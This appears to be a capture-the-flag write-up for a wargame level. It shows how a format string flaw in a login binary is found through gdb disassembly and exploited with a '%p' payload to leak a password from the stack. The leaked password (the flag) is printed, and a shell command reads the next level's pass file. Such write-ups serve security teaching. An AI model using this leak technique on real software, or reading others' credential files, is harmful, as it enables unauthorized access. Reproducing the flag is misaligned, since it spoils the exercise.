We've started executing the binary to see what was asking.
It asked a username and a password. If the input was wrong it printed " does not have access!".
Probably a printf was involved.
We verified using gdb and effectively printf was present and we noticed that the one used to print the username is vulnerable since the username string is printed directly.
Dump of assembler code for function main:
0x0000000000400a96 <+642>: lea rax,[rbp-0x70] <- address of username string
0x0000000000400a9a <+646>: mov rdi,rax <- username string is pushed as first parameter
of printf
0x0000000000400a9d <+649>: mov eax,0x0
0x0000000000400aa2 <+654>: call 0x4006c0 <printf@plt> <- unprotected printf
0x0000000000400aa7 <+659>: mov edi,0x400d3a
0x0000000000400aac <+664>: call 0x400680 <puts@plt>
0x0000000000400ab1 <+669>: mov edi,0x1
0x0000000000400ab6 <+674>: call 0x400710 <exit@plt>
Since we have a vulnerable printf we can try a format string attack.
We test using
python -c "print '%p ' * 100" | ./level02
we can see that since the printf isn't protected some addresses from the stack are printed.
Since the program opened the .pass file from level03 that was pushed to the stack, we only needed to find some addresses convertible in ascii.
756e505234376848 = unPR47hH (ascii)
45414a3561733951 = EAJ5as9Q (ascii)
377a7143574e6758 = 7zqCWNgX (ascii)
354a35686e475873 = 5J5hnGXs (ascii)
48336750664b394d = H3gPfK9M (ascii)
After we reverse them since
unPR47hH (ascii) <=> Hh74RPnu (reversed)
EAJ5as9Q (ascii) <=> Q9sa5JAE (reversed)
7zqCWNgX (ascii) <=> XgNWCqz7 (reversed)
5J5hnGXs (ascii) <=> sXGnh5J5 (reversed)
H3gPfK9M (ascii) <=> M9KfPg3H (reversed)
Adding them up we have the password to get to the level03 shell that is also the flag.
===== [ Secure Access System v1.0 ] =====
| You must login to access this system. |
--[ Username:
--[ Password: Hh74RPnuQ9sa5JAEXgNWCqz7sXGnh5J5M9KfPg3H
Greetings, !
$ whoami
$ cat ~level03/.pass